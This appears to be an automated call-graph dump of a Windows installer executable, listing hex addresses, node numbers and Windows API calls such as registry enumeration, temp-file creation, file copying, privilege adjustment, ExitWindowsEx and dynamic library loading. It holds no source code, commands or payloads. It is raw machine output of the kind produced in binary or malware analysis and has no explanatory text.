402495 3776 40249f 3775->3776 3780 4026a6 3775->3780 3777 4024b8 RegEnumValueA 3776->3777 3778 4024ac RegEnumKeyA 3776->3778 3779 4024d1 RegCloseKey 3777->3779 3777->3780 3778->3779 3779->3780 3789 402a3a 3782->3789 3784 402b5d 3785 402b6b RegOpenKeyExA 3784->3785 3785->3773 3787 405d51 18 API calls 3786->3787 3788 402a31 3787->3788 3788->3775 3790 402a46 3789->3790 3791 405d51 18 API calls 3790->3791 3792 402a67 3791->3792 3793 402a73 3792->3793 3794 405f9a 5 API calls 3792->3794 3793->3784 3794->3793 5138 401b02 5139 402a3a 18 API calls 5138->5139 5140 401b09 5139->5140 5141 402a1d 18 API calls 5140->5141 5142 401b12 wsprintfA 5141->5142 5143 4028cf 5142->5143 3795 401a03 3796 402a3a 18 API calls 3795->3796 3797 401a0c ExpandEnvironmentStringsA 3796->3797 3798 401a20 3797->3798 3800 401a33 3797->3800 3799 401a25 lstrcmpA 3798->3799 3798->3800 3799->3800 3801 402283 3802 402291 3801->3802 3803 40228b 3801->3803 3805 4022a1 3802->3805 3806 402a3a 18 API calls 3802->3806 3804 402a3a 18 API calls 3803->3804 3804->3802 3807 4022af 3805->3807 3808 402a3a 18 API calls 3805->3808 3806->3805 3809 402a3a 18 API calls 3807->3809 3808->3807 3810 4022b8 WritePrivateProfileStringA 3809->3810 5144 100029c3 5145 100029db 5144->5145 5146 10001534 2 API calls 5145->5146 5147 100029f6 5146->5147 3846 405086 3847 405231 3846->3847 3848 4050a8 GetDlgItem GetDlgItem GetDlgItem 3846->3848 3850 405261 3847->3850 3851 405239 GetDlgItem CreateThread CloseHandle 3847->3851 3892 403f49 SendMessageA 3848->3892 3853 40528f 3850->3853 3854 4052b0 3850->3854 3855 405277 ShowWindow ShowWindow 3850->3855 3851->3850 3895 40501a OleInitialize 3851->3895 3852 405118 3858 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3852->3858 3856 405297 3853->3856 3857 4052ea 3853->3857 3862 403f7b 8 API calls 3854->3862 3894 403f49 SendMessageA 3855->3894 3860 4052c3 ShowWindow 3856->3860 3861 40529f 3856->3861 3857->3854 3867 4052f7 SendMessageA 3857->3867 3865 405171 SendMessageA SendMessageA 3858->3865 3866 40518d 3858->3866 3863 4052e3 3860->3863 3864 4052d5 3860->3864 3868 403eed SendMessageA 3861->3868 3869 4052bc 3862->3869 3871 403eed SendMessageA 3863->3871 3870 404f48 25 API calls 3864->3870 3865->3866 3872 4051a0 3866->3872 3873 405192 SendMessageA 3866->3873 3867->3869 3874 405310 CreatePopupMenu 3867->3874 3868->3854 3870->3863 3871->3857 3876 403f14 19 API calls 3872->3876 3873->3872 3875 405d51 18 API calls 3874->3875 3877 405320 AppendMenuA 3875->3877 3878 4051b0 3876->3878 3879 405351 TrackPopupMenu 3877->3879 3880 40533e GetWindowRect 3877->3880 3881 4051b9 ShowWindow 3878->3881 3882 4051ed GetDlgItem SendMessageA 3878->3882 3879->3869 3884 40536d 3879->3884 3880->3879 3885 4051dc 3881->3885 3886 4051cf ShowWindow 3881->3886 3882->3869 3883 405214 SendMessageA SendMessageA 3882->3883 3883->3869 3887 40538c SendMessageA 3884->3887 3893 403f49 SendMessageA 3885->3893 3886->3885 3887->3887 3889 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3887->3889 3890 4053cb SendMessageA 3889->3890 3890->3890 3891 4053ed GlobalUnlock SetClipboardData CloseClipboard 3890->3891 3891->3869 3892->3852 3893->3882 3894->3853 3896 403f60 SendMessageA 3895->3896 3897 40503d 3896->3897 3900 401389 2 API calls 3897->3900 3901 405064 3897->3901 3898 403f60 SendMessageA 3899 405076 OleUninitialize 3898->3899 3900->3897 3901->3898 3909 402308 3910 402338 3909->3910 3911 40230d 3909->3911 3912 402a3a 18 API calls 3910->3912 3913 402b44 19 API calls 3911->3913 3915 40233f 3912->3915 3914 402314 3913->3914 3916 40231e 3914->3916 3920 402355 3914->3920 3921 402a7a RegOpenKeyExA 3915->3921 3917 402a3a 18 API calls 3916->3917 3918 402325 RegDeleteValueA RegCloseKey 3917->3918 3918->3920 3922 402b0e 3921->3922 3930 402aa5 3921->3930 3922->3920 3923 402acb RegEnumKeyA 3924 402add RegCloseKey 3923->3924 3923->3930 3932 4060c8 GetModuleHandleA 3924->3932 3925 402b02 RegCloseKey 3929 402af1 3925->3929 3927 402a7a 5 API calls 3927->3930 3929->3922 3930->3923 3930->3924 3930->3925 3930->3927 3931 402b1d RegDeleteKeyA 3931->3929 3933 4060e4 3932->3933 3934 4060ee GetProcAddress 3932->3934 3938 40605a GetSystemDirectoryA 3933->3938 3936 402aed 3934->3936 3936->3929 3936->3931 3937 4060ea 3937->3934 3937->3936 3939 40607c wsprintfA LoadLibraryExA 3938->3939 3939->3937 3941 402688 3942 402a3a 18 API calls 3941->3942 3943 40268f FindFirstFileA 3942->3943 3944 4026b2 3943->3944 3947 4026a2 3943->3947 3945 4026b9 3944->3945 3949 405c8d wsprintfA 3944->3949 3950 405d2f lstrcpynA 3945->3950 3949->3945 3950->3947 5148 401c8a 5149 402a1d 18 API calls 5148->5149 5150 401c90 IsWindow 5149->5150 5151 4019f3 5150->5151 5152 40430b 5153 404341 5152->5153 5154 40431b 5152->5154 5156 403f7b 8 API calls 5153->5156 5155 403f14 19 API calls 5154->5155 5157 404328 SetDlgItemTextA 5155->5157 5158 40434d 5156->5158 5157->5153 3976 40310f SetErrorMode GetVersion 3977 403146 3976->3977 3978 40314c 3976->3978 3979 4060c8 5 API calls 3977->3979 3980 40605a 3 API calls 3978->3980 3979->3978 3981 403162 lstrlenA 3980->3981 3981->3978 3982 403171 3981->3982 3983 4060c8 5 API calls 3982->3983 3984 403179 3983->3984 3985 4060c8 5 API calls 3984->3985 3986 403180 #17 OleInitialize SHGetFileInfoA 3985->3986 4064 405d2f lstrcpynA 3986->4064 3988 4031bd GetCommandLineA 4065 405d2f lstrcpynA 3988->4065 3990 4031cf GetModuleHandleA 3991 4031e6 3990->3991 3992 4057cc CharNextA 3991->3992 3993 4031fa CharNextA 3992->3993 4001 40320a 3993->4001 3994 4032d4 3995 4032e7 GetTempPathA 3994->3995 4066 4030de 3995->4066 3997 4032ff 3998 403303 GetWindowsDirectoryA lstrcatA 3997->3998 3999 403359 DeleteFileA 3997->3999 4002 4030de 12 API calls 3998->4002 4076 402c66 GetTickCount GetModuleFileNameA 3999->4076 4000 4057cc CharNextA 4000->4001 4001->3994 4001->4000 4005 4032d6 4001->4005 4004 40331f 4002->4004 4004->3999 4008 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4004->4008 4160 405d2f lstrcpynA 4005->4160 4006 40336d 4011 4033f3 4006->4011 4012 4057cc CharNextA 4006->4012 4060 403403 4006->4060 4010 4030de 12 API calls 4008->4010 4014 403351 4010->4014 4104 4036af 4011->4104 4016 403388 4012->4016 4014->3999 4014->4060 4023 403433 4016->4023 4024 4033ce 4016->4024 4017 40353b 4020 403543 GetCurrentProcess OpenProcessToken 4017->4020 4021 4035bd ExitProcess 4017->4021 4018 40341d 4184 405525 4018->4184 4026 40358e 4020->4026 4027 40355e LookupPrivilegeValueA AdjustTokenPrivileges 4020->4027 4188 4054a8 4023->4188 4161 40588f 4024->4161 4030 4060c8 5 API calls 4026->4030 4027->4026 4033 403595 4030->4033 4036 4035aa ExitWindowsEx 4033->4036 4037 4035b6 4033->4037 4034 403454 lstrcatA lstrcmpiA 4039 403470 4034->4039 4034->4060 4035 403449 lstrcatA 4035->4034 4036->4021 4036->4037 4040 40140b 2 API calls 4037->4040 4042 403475 4039->4042 4043 40347c 4039->4043 4040->4021 4041 4033e8 4176 405d2f lstrcpynA 4041->4176 4191 40540e CreateDirectoryA 4042->4191 4196 40548b CreateDirectoryA 4043->4196 4047 403481 SetCurrentDirectoryA 4049 403490 4047->4049 4050 40349b 4047->4050 4199 405d2f lstrcpynA 4049->4199 4200 405d2f lstrcpynA 4050->4200 4053 4034a9 4054 405d51 18 API calls 4053->4054 4057 40352f 4053->4057 4061 405d51 18 API calls 4053->4061 4062 4054c0 2 API calls 4053->4062 4063 40351b CloseHandle 4053->4063 4201 405bea MoveFileExA 4053->4201 4055 4034da DeleteFileA 4054->4055 4055->4053 4056 4034e7 CopyFileA 4055->4056 4056->4053 4058 405bea 38 API calls 4057->4058 4058->4060 4177 4035d5 4060->4177 4061->4053 4062->4053 4063->4053 4064->3988 4065->3990 4067 405f9a 5 API calls 4066->4067 4068 4030ea 4067->4068 4069 4030f4 4068->4069 4205 4057a1 lstrlenA CharPrevA 4068->4205 4069->3997 4072 40548b 2 API calls 4073 403102 4072->4073 4208 4059d1 4073->4208 4212 4059a2 GetFileAttributesA CreateFileA 4076->4212 4078 402ca6 4099 402cb6 4078->4099 4213 405d2f lstrcpynA 4078->4213 4080 402ccc 4214 4057e8 lstrlenA 4080->4214 4084 402cdd GetFileSize 4085 402cf4 4084->4085 4086 402dd9 4084->4086 4085->4086 4091 402e45 4085->4091 4085->4099 4100 402c02 6 API calls 4085->4100 4251 4030b1 4085->4251 4219 402c02 4086->4219 4088 402de2 4090 402e12 GlobalAlloc 4088->4090 4088->4099 4254 4030c7 SetFilePointer 4088->4254 4230 4030c7 SetFilePointer 4090->4230 4095 402c02 6 API calls 4091->4095 4094 402e2d 4231 402e9f 4094->4231 4095->4099 4096 402dfb 4097 4030b1 ReadFile 4096->4097 4101 402e06 4097->4101 4099->4006 4100->4085 4101->4090 4101->4099 4103 402e76 SetFilePointer 4103->4099 4105 4060c8 5 API calls 4104->4105 4106 4036c3 4105->4106 4107 4036c9 4106->4107 4108 4036db 4106->4108 4269 405c8d wsprintfA 4107->4269 4109 405c16 3 API calls 4108->4109 4110 403706 4109->4110 4111 403724 lstrcatA 4110->4111 4113 405c16 3 API calls 4110->4113 4114 4036d9 4111->4114 4113->4111 4260 403974 4114->4260 4117 40588f 18 API calls 4118 403756 4117->4118 4119 4037df 4118->4119 4121 405c16 3 API calls 4118->4121 4120 40588f 18 API calls 4119->4120 4122 4037e5 4120->4122 4123 403782 4121->4123 4124 4037f5 LoadImageA 4122->4124 4127 405d51 18 API calls 4122->4127 4123->4119 4130 40379e lstrlenA 4123->4130 4133 4057cc CharNextA 4123->4133 4125 40389b 4124->4125 4126 40381c RegisterClassA 4124->4126 4129 40140b 2 API calls 4125->4129 4128 403852 SystemParametersInfoA CreateWindowExA 4126->4128 4159 4038a5 4126->4159 4127->4124 4128->4125 4135 4038a1 4129->4135 4131 4037d2 4130->4131 4132 4037ac lstrcmpiA 4130->4132 4136 4057a1 3 API calls 4131->4136 4132->4131 4134 4037bc GetFileAttributesA 4132->4134 4137 40379c 4133->4137 4138 4037c8 4134->4138 4139 403974 19 API calls 4135->4139 4135->4159 4140 4037d8 4136->4140 4137->4130 4138->4131 4141 4057e8 2 API calls 4138->4141 4142 4038b2 4139->4142 4270 405d2f lstrcpynA 4140->4270 4141->4131 4144 403941 4142->4144 4145 4038be ShowWindow 4142->4145 4146 40501a 5 API calls 4144->4146 4147 40605a 3 API calls 4145->4147 4148 403947 4146->4148 4149 4038d6 4147->4149 4150 403963 4148->4150 4151 40394b 4148->4151 4152 4038e4 GetClassInfoA 4149->4152 4154 40605a 3 API calls 4149->4154 4153 40140b 2 API calls 4150->4153 4158 40140b 2 API calls 4151->4158 4151->4159 4155 4038f8 GetClassInfoA RegisterClassA 4152->4155 4156 40390e DialogBoxParamA 4152->4156 4153->4159 4154->4152 4155->4156 4157 40140b 2 API calls 4156->4157 4157->4159 4158->4159 4159->4060 4160->3995 4272 405d2f lstrcpynA 4161->4272 4163 4058a0 4273 40583a CharNextA CharNextA 4163->4273 4166 4033d9 4166->4060 4175 405d2f lstrcpynA 4166->4175 4167 405f9a 5 API calls 4170 4058b6 4167->4170 4168 4058e1 lstrlenA 4169 4058ec 4168->4169 4168->4170 4172 4057a1 3 API calls 4169->4172 4170->4166 4170->4168 4174 4057e8 2 API calls 4170->4174 4279 406033 FindFirstFileA 4170->4279 4173 4058f1 GetFileAttributesA 4172->4173 4173->4166 4174->4168 4175->4041 4176->4011 4178 4035ed 4177->4178 4179 4035df CloseHandle 4177->4179 4282 40361a 4178->4282 4179->4178 4186 40553a 4184->4186 4185 40342b ExitProcess 4186->4185 4187 40554e MessageBoxIndirectA 4186->4187 4187->4185 4189 4060c8 5 API calls 4188->4189 4190 403438 lstrcatA 4189->4190 4190->4034 4190->4035 4192 40347a 4191->4192 4193 40545f GetLastError 4191->4193 4192->4047 4193->4192 4194 40546e SetFileSecurityA 4193->4194 4194->4192 4195 405484 GetLastError 4194->4195 4195->4192 4197 40549b 4196->4197 4198 40549f GetLastError 4196->4198 4197->4047 4198->4197 4199->4050 4200->4053 4202 405c0b 4201->4202 4203 405bfe 4201->4203 4202->4053 4339 405a78 lstrcpyA 4203->4339 4206 4030fc 4205->4206 4207 4057bb lstrcatA 4205->4207 4206->4072 4207->4206 4209 4059dc GetTickCount GetTempFileNameA 4208->4209 4210 40310d 4209->4210 4211 405a09 4209->4211 4210->3997 4211->4209 4211->4210 4212->4078 4213->4080 4215 4057f5 4214->4215 4216 402cd2 4215->4216 4217 4057fa CharPrevA 4215->4217 4218 405d2f lstrcpynA 4216->4218 4217->4215 4217->4216 4218->4084 4220 402c23 4219->4220 4221 402c0b 4219->4221 4224 402c33 GetTickCount 4220->4224 4225 402c2b 4220->4225 4222 402c14 DestroyWindow 4221->4222 4223 402c1b 4221->4223 4222->4223 4223->4088 4226 402c41 CreateDialogParamA ShowWindow 4224->4226 4227 402c64 4224->4227 4228 406104 2 API calls 4225->4228 4226->4227 4227->4088 4229 402c31 4228->4229 4229->4088 4230->4094 4233 402eb5 4231->4233 4232 402ee3 4235 4030b1 ReadFile 4232->4235 4233->4232 4257 4030c7 SetFilePointer 4233->4257 4236 402eee 4235->4236 4237 402f00 GetTickCount 4236->4237 4238 40304a 4236->4238 4240 402e39 4236->4240 4237->4240 4247 402f4f 4237->4247 4239 40308c 4238->4239 4244 40304e 4238->4244 4241 4030b1 ReadFile 4239->4241 4240->4099 4240->4103 4241->4240 4242 4030b1 ReadFile 4242->4247 4243 4030b1 ReadFile 4243->4244 4244->4240 4244->4243 4245 405a49 WriteFile 4244->4245 4245->4244 4246 402fa5 GetTickCount 4246->4247 4247->4240 4247->4242 4247->4246 4248 402fca MulDiv wsprintfA 4247->4248 4255 405a49 WriteFile 4247->4255 4249 404f48 25 API calls 4248->4249 4249->4247 4258 405a1a ReadFile 4251->4258 4254->4096 4256 405a67 4255->4256 4256->4247 4257->4232 4259 4030c4 4258->4259 4259->4085 4261 403988 4260->4261 4271 405c8d wsprintfA 4261->4271 4263 4039f9 4264 405d51 18 API calls 4263->4264 4265 403a05 SetWindowTextA 4264->4265 4266 403734 4265->4266 4267 403a21 4265->4267 4266->4117 4267->4266 4268 405d51 18 API calls 4267->4268 4268->4267 4269->4114 4270->4119 4271->4263 4272->4163 4274 405865 4273->4274 4275 405855 4273->4275 4276 405885 4274->4276 4278 4057cc CharNextA 4274->4278 4275->4274 4277 405860 CharNextA 4275->4277 4276->4166 4276->4167 4277->4276 4278->4274 4280 406054 4279->4280 4281 406049 FindClose 4279->4281 4280->4170 4281->4280 4283 403628 4282->4283 4284 4035f2 4283->4284 4285 40362d FreeLibrary GlobalFree 4283->4285 4286 4055d1 4284->4286 4285->4284 4285->4285 4287 40588f 18 API calls 4286->4287 4288 4055f1 4287->4288 4289 405610 4288->4289 4290 4055f9 DeleteFileA 4288->4290 4292 405748 4289->4292 4326 405d2f lstrcpynA 4289->4326 4291 40340c OleUninitialize 4290->4291 4291->4017 4291->4018 4292->4291 4297 406033 2 API calls 4292->4297 4294 405636 4295 405649 4294->4295 4296 40563c lstrcatA 4294->4296 4299 4057e8 2 API calls 4295->4299 4298 40564f 4296->4298 4300 405762 4297->4300 4301 40565d lstrcatA 4298->4301 4303 405668 lstrlenA FindFirstFileA 4298->4303 4299->4298 4300->4291 4302 405766 4300->4302 4301->4303 4304 4057a1 3 API calls 4302->4304 4305 40573e 4303->4305 4324 40568c 4303->4324 4306 40576c 4304->4306 4305->4292 4308 405589 5 API calls 4306->4308 4307 4057cc CharNextA 4307->4324 4309 405778 4308->4309 4310 405792 4309->4310 4311 40577c 4309->4311 4312 404f48 25 API calls 4310->4312 4311->4291 4316 404f48 25 API calls 4311->4316 4312->4291 4313 40571d FindNextFileA 4315 405735 FindClose 4313->4315 4313->4324 4315->4305 4317 405789 4316->4317 4318 405bea 38 API calls 4317->4318 4321 405790 4318->4321 4320 4055d1 62 API calls 4320->4324 4321->4291 4322 404f48 25 API calls 4322->4313 4323 404f48 25 API calls 4323->4324 4324->4307 4324->4313 4324->4320 4324->4322 4324->4323 4325 405bea 38 API calls 4324->4325 4327 405d2f lstrcpynA 4324->4327 4328 405589 4324->4328 4325->4324 4326->4294 4327->4324 4336 40597d GetFileAttributesA 4328->4336 4331 4055b6 4331->4324 4332 4055a4 RemoveDirectoryA 4334 4055b2 4332->4334 4333 4055ac DeleteFileA 4333->4334 4334->4331 4335 4055c2 SetFileAttributesA 4334->4335 4335->4331 4337 405595 4336->4337 4338 40598f SetFileAttributesA 4336->4338 4337->4331 4337->4332 4337->4333 4338->4337 4340 405aa0 4339->4340 4341 405ac6 GetShortPathNameA 4339->4341 4366 4059a2 GetFileAttributesA CreateFileA 4340->4366 4342 405be5 4341->4342 4343 405adb 4341->4343 4342->4202 4343->4342 4346 405ae3 wsprintfA 4343->4346 4345 405aaa CloseHandle GetShortPathNameA 4345->4342 4347 405abe 4345->4347 4348 405d51 18 API calls 4346->4348 4347->4341 4347->4342 4349 405b0b 4348->4349 4367 4059a2 GetFileAttributesA CreateFileA 4349->4367 4351 405b18 4351->4342 4352 405b27 GetFileSize GlobalAlloc 4351->4352 4353 405b49 4352->4353 4354 405bde CloseHandle 4352->4354 4355 405a1a ReadFile 4353->4355 4354->4342 4356 405b51 4355->4356 4356->4354 4368 405907 lstrlenA 4356->4368 4359 405b68 lstrcpyA 4363 405b8a 4359->4363 4360 405b7c 4361 405907 4 API calls 4360->4361 4361->4363 4362 405bc1 SetFilePointer 4364 405a49 WriteFile 4362->4364 4363->4362 4365 405bd7 GlobalFree 4364->4365 4365->4354 4366->4345 4367->4351 4369 405948 lstrlenA 4368->4369 4370 405950 4369->4370 4371 405921 lstrcmpiA 4369->4371 4370->4359 4370->4360 4371->4370 4372 40593f CharNextA 4371->4372 4372->4369 4373 402410 4374 402b44 19 API calls 4373->4374 4375 40241a 4374->4375 4376 402a3a 18 API calls 4375->4376 4377 402423 4376->4377 4378 40242d RegQueryValueExA 4377->4378 4380 4026a6 4377->4380 4379 40244d 4378->4379 4383 402453 RegCloseKey 4378->4383 4379->4383 4384 405c8d wsprintfA 4379->4384 4383->4380 4384->4383 4385 401f90 4386 401fa2 4385->4386 4387 402050 4385->4387 4388 402a3a 18 API calls 4386->4388 4389 401423 25 API calls 4387->4389 4390 401fa9 4388->4390 4396 4021c9 4389->4396 4391 402a3a 18 API calls 4390->4391 4392 401fb2 4391->4392 4393 401fc7 LoadLibraryExA 4392->4393 4394 401fba GetModuleHandleA 4392->4394 4393->4387 4395 401fd7 GetProcAddress 4393->4395 4394->4393 4394->4395 4397 402023 4395->4397 4398 401fe6 4395->4398 4401 404f48 25 API calls 4397->4401 4399 402005 4398->4399 4400 401fee 4398->4400 4406 100016bd 4399->4406 4448 401423 4400->4448 4402 401ff6 4401->4402 4402->4396 4404 402044 FreeLibrary 4402->4404 4404->4396 4407 100016ed 4406->4407 4451 10001a5d 4407->4451 4409 100016f4 4410 1000180a 4409->4410 4411 10001705 4409->4411 4412 1000170c 4409->4412 4410->4402 4500 100021b0 4411->4500 4483 100021fa 4412->4483 4417 10001770 4423 100017b2 4417->4423 4424 10001776 4417->4424 4418 10001752 4513 100023da 4418->4513 4419 10001722 4422 10001728 4419->4422 4428 10001733 4419->4428 4420 1000173b 4433 10001731 4420->4433 4510 10002aa3 4420->4510 4422->4433 4494 100027e8 4422->4494 4426 100023da 11 API calls 4423->4426 4430 10001559 3 API calls 4424->4430 4431 100017a4 4426->4431 4427 10001758 4524 10001559 4427->4524 4504 10002589 4428->4504 4435 1000178c 4430->4435 4439 100017f9 4431->4439 4535 100023a0 4431->4535 4433->4417 4433->4418 4438 100023da 11 API calls 4435->4438 4437 10001739 4437->4433 4438->4431 4439->4410 4441 10001803 GlobalFree 4439->4441 4441->4410 4445 100017e5 4445->4439 4539 100014e2 wsprintfA 4445->4539 4446 100017de FreeLibrary 4446->4445 4449 404f48 25 API calls 4448->4449 4450 401431 4449->4450 4450->4402 4542 10001215 GlobalAlloc 4451->4542 4453 10001a81 4543 10001215 GlobalAlloc 4453->4543 4455 10001cbb GlobalFree GlobalFree GlobalFree 4456 10001cd8 4455->4456 4475 10001d22 4455->4475 4457 1000201a 4456->4457 4464 10001ced 4456->4464 4456->4475 4459 1000203c GetModuleHandleA 4457->4459 4457->4475 4458 10001b60 GlobalAlloc 4480 10001a8c 4458->4480 4462 10002062 4459->4462 4463 1000204d LoadLibraryA 4459->4463 4460 10001bab lstrcpyA 4465 10001bb5 lstrcpyA 4460->4465 4461 10001bc9 GlobalFree 4461->4480 4550 100015a4 GetProcAddress 4462->4550 4463->4462 4463->4475 4464->4475 4546 10001224 4464->4546 4465->4480 4467 100020b3 4469 100020c0 lstrlenA 4467->4469 4467->4475 4468 10001f7a 4474 10001fbe lstrcpyA 4468->4474 4468->4475 4551 100015a4 GetProcAddress 4469->4551 4471 10002074 4471->4467 4482 1000209d GetProcAddress 4471->4482 4474->4475 4475->4409 4476 10001c07 4476->4480 4544 10001534 GlobalSize GlobalAlloc 4476->4544 4477 10001e75 GlobalFree 4477->4480 4478 100020d9 4478->4475 4480->4455 4480->4458 4480->4460 4480->4461 4480->4465 4480->4468 4480->4475 4480->4476 4480->4477 4481 10001224 2 API calls 4480->4481 4549 10001215 GlobalAlloc 4480->4549 4481->4480 4482->4467 4484 10002212 4483->4484 4486 10002349 GlobalFree 4484->4486 4487 100022b9 GlobalAlloc MultiByteToWideChar 4484->4487 4488 1000230a lstrlenA 4484->4488 4490 10001224 GlobalAlloc lstrcpynA 4484->4490 4553 100012ad 4484->4553 4486->4484 4489 10001712 4486->4489 4491 10002303 4487->4491 4492 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4487->4492 4488->4486 4488->4491 4489->4419 4489->4420 4489->4433 4490->4484 4491->4486 4557 1000251d 4491->4557 4492->4486 4496 100027fa 4494->4496 4495 1000289f VirtualAlloc 4497 100028bd 4495->4497 4496->4495 4498 100029b9 4497->4498 4499 100029ae GetLastError 4497->4499 4498->4433 4499->4498 4501 100021c0 4500->4501 4502 1000170b 4500->4502 4501->4502 4503 100021d2 GlobalAlloc 4501->4503 4502->4412 4503->4501 4508 100025a5 4504->4508 4505 100025f6 GlobalAlloc 4509 10002618 4505->4509 4506 10002609 4507 1000260e GlobalSize 4506->4507 4506->4509 4507->4509 4508->4505 4508->4506 4509->4437 4512 10002aae 4510->4512 4511 10002aee GlobalFree 4512->4511 4560 10001215 GlobalAlloc 4513->4560 4515 1000243a lstrcpynA 4520 100023e6 4515->4520 4516 1000244b StringFromGUID2 WideCharToMultiByte 4516->4520 4517 1000246f WideCharToMultiByte 4517->4520 4518 100024b4 GlobalFree 4518->4520 4519 10002490 wsprintfA 4519->4520 4520->4515 4520->4516 4520->4517 4520->4518 4520->4519 4521 100024ee GlobalFree 4520->4521 4522 10001266 2 API calls 4520->4522 4561 100012d1 4520->4561 4521->4427 4522->4520 4565 10001215 GlobalAlloc 4524->4565 4526 1000155f 4527 1000156c lstrcpyA 4526->4527 4529 10001586 4526->4529 4530 100015a0 4527->4530 4529->4530 4531 1000158b wsprintfA 4529->4531 4532 10001266 4530->4532 4531->4530 4533 100012a8 GlobalFree 4532->4533 4534 1000126f GlobalAlloc lstrcpynA 4532->4534 4533->4431 4534->4533 4536 100017c5 4535->4536 4537 100023ae 4535->4537 4536->4445 4536->4446 4537->4536 4538 100023c7 GlobalFree 4537->4538 4538->4537 4540 10001266 2 API calls 4539->4540 4541 10001503 4540->4541 4541->4439 4542->4453 4543->4480 4545 10001552 4544->4545 4545->4476 4552 10001215 GlobalAlloc 4546->4552 4548 10001233 lstrcpynA 4548->4475 4549->4480 4550->4471 4551->4478 4552->4548 4554 100012b4 4553->4554 4555 10001224 2 API calls 4554->4555 4556 100012cf 4555->4556 4556->4484 4558 10002581 4557->4558 4559 1000252b VirtualAlloc 4557->4559 4558->4491 4559->4558 4560->4520 4562 100012f9 4561->4562 4563 100012da 4561->4563 4562->4520 4563->4562 4564 100012e0 lstrcpyA 4563->4564 4564->4562 4565->4526 5159 401490 5160 404f48 25 API calls 5159->5160 5161 401497 5160->5161 4607 401595 4608 402a3a 18 API calls 4607->4608 4609 40159c SetFileAttributesA 4608->4609 4610 4015ae 4609->4610 5162 402616 5163 40261d 5162->5163 5166 40287c 5162->5166 5164 402a1d 18 API calls 5163->5164 5165 402628 5164->5165 5167 40262f SetFilePointer 5165->5167 5167->5166 5168 40263f 5167->5168 5170 405c8d wsprintfA 5168->5170 5170->5166 4616 401717 4617 402a3a 18 API calls 4616->4617 4618 40171e SearchPathA 4617->4618 4619 401739 4618->4619 5171 10001058 5173 10001074 5171->5173 5172 100010dc 5173->5172 5174 100014bb GlobalFree 5173->5174 5175 10001091 5173->5175 5174->5175 5176 100014bb GlobalFree 5175->5176 5177 100010a1 5176->5177 5178 100010b1 5177->5178 5179 100010a8 GlobalSize 5177->5179 5180 100010b5 GlobalAlloc 5178->5180 5181 100010c6 5178->5181 5179->5178 5182 100014e2 3 API calls 5180->5182 5183 100010d1 GlobalFree 5181->5183 5182->5181 5183->5172 5184 402519 5185 40252e 5184->5185 5186 40251e 5184->5186 5188 402a3a 18 API calls 5185->5188 5187 402a1d 18 API calls 5186->5187 5190 402527 5187->5190 5189 402535 lstrlenA 5188->5189 5189->5190 5191 405a49 WriteFile 5190->5191 5192 402557 5190->5192 5191->5192 5193 40149d 5194 4014ab PostQuitMessage 5193->5194 5195 40226e 5193->5195 5194->5195 5196 100010e0 5198 1000110e 5196->5198 5197 100011c4 GlobalFree 5198->5197 5199 100012ad 2 API calls 5198->5199 5200 100011c3 5198->5200 5201 10001266 2 API calls 5198->5201 5202 10001155 GlobalAlloc 5198->5202 5203 100011ea GlobalFree 5198->5203 5204 100012d1 lstrcpyA 5198->5204 5205 100011b1 GlobalFree 5198->5205 5199->5198 5200->5197 5201->5205 5202->5198 5203->5198 5204->5198 5205->5198 5206 10002162 5207 100021c0 5206->5207 5208 100021f6 5206->5208 5207->5208 5209 100021d2 GlobalAlloc 5207->5209 5209->5207 5210 4046a3 5211 4046b3 5210->5211 5212 4046cf 5210->5212 5221 405509 GetDlgItemTextA 5211->5221 5214 404702 5212->5214 5215 4046d5 SHGetPathFromIDListA 5212->5215 5217 4046e5 5215->5217 5220 4046ec SendMessageA 5215->5220 5216 4046c0 SendMessageA 5216->5212 5219 40140b 2 API calls 5217->5219 5219->5220 5220->5214 5221->5216 5222 401ca7 5223 402a1d 18 API calls 5222->5223 5224 401cae 5223->5224 5225 402a1d 18 API calls 5224->5225 5226 401cb6 GetDlgItem 5225->5226 5227 402513 5226->5227 5228 404028 lstrcpynA lstrlenA 5229 4028aa SendMessageA 5230 4028c4 InvalidateRect 5229->5230 5231 4028cf 5229->5231 5230->5231 4678 4015b3 4679 402a3a 18 API calls 4678->4679 4680 4015ba 4679->4680 4681 40583a 4 API calls 4680->4681 4693 4015c2 4681->4693 4682 40161c 4684 401621 4682->4684 4685 40164a 4682->4685 4683 4057cc CharNextA 4683->4693 4686 401423 25 API calls 4684->4686 4687 401423 25 API calls 4685->4687 4688 401628 4686->4688 4695 401642 4687->4695 4697 405d2f lstrcpynA 4688->4697 4690 40548b 2 API calls 4690->4693 4691 4054a8 5 API calls 4691->4693 4692 401633 SetCurrentDirectoryA 4692->4695 4693->4682 4693->4683 4693->4690 4693->4691 4694 401604 GetFileAttributesA 4693->4694 4696 40540e 4 API calls 4693->4696 4694->4693 4696->4693 4697->4692 5232 4016b3 5233 402a3a 18 API calls 5232->5233 5234 4016b9 GetFullPathNameA 5233->5234 5235 4016f1 5234->5235 5236 4016d0 5234->5236 5237 401705 GetShortPathNameA 5235->5237 5238 4028cf 5235->5238 5236->5235 5239 406033 2 API calls 5236->5239 5237->5238 5240 4016e1 5239->5240 5240->5235 5242 405d2f lstrcpynA 5240->5242 5242->5235 5243 4014b7 5244 4014bd 5243->5244 5245 401389 2 API calls 5244->5245 5246 4014c5 5245->5246 5247 401d38 GetDC GetDeviceCaps 5248 402a1d 18 API calls 5247->5248 5249 401d56 MulDiv ReleaseDC 5248->5249 5250 402a1d 18 API calls 5249->5250 5251 401d75 5250->5251 5252 405d51 18 API calls 5251->5252 5253 401dae CreateFontIndirectA 5252->5253 5254 402513 5253->5254 5255 404ebc 5256 404ee0 5255->5256 5257 404ecc 5255->5257 5259 404ee8 IsWindowVisible 5256->5259 5263 404eff 5256->5263 5258 404ed2 5257->5258 5267 404f29 5257->5267 5261 403f60 SendMessageA 5258->5261 5262 404ef5 5259->5262 5259->5267 5260 404f2e CallWindowProcA 5264 404edc 5260->5264 5261->5264 5265 404813 5 API calls 5262->5265 5263->5260 5266 404893 4 API calls 5263->5266 5265->5263 5266->5267 5267->5260 4698 40173e 4699 402a3a 18 API calls 4698->4699 4700 401745 4699->4700 4701 4059d1 2 API calls 4700->4701 4702 40174c 4701->4702 4703 4059d1 2 API calls 4702->4703 4703->4702 5268 401ebe 5269 402a3a 18 API calls 5268->5269 5270 401ec5 5269->5270 5271 406033 2 API calls 5270->5271 5272 401ecb 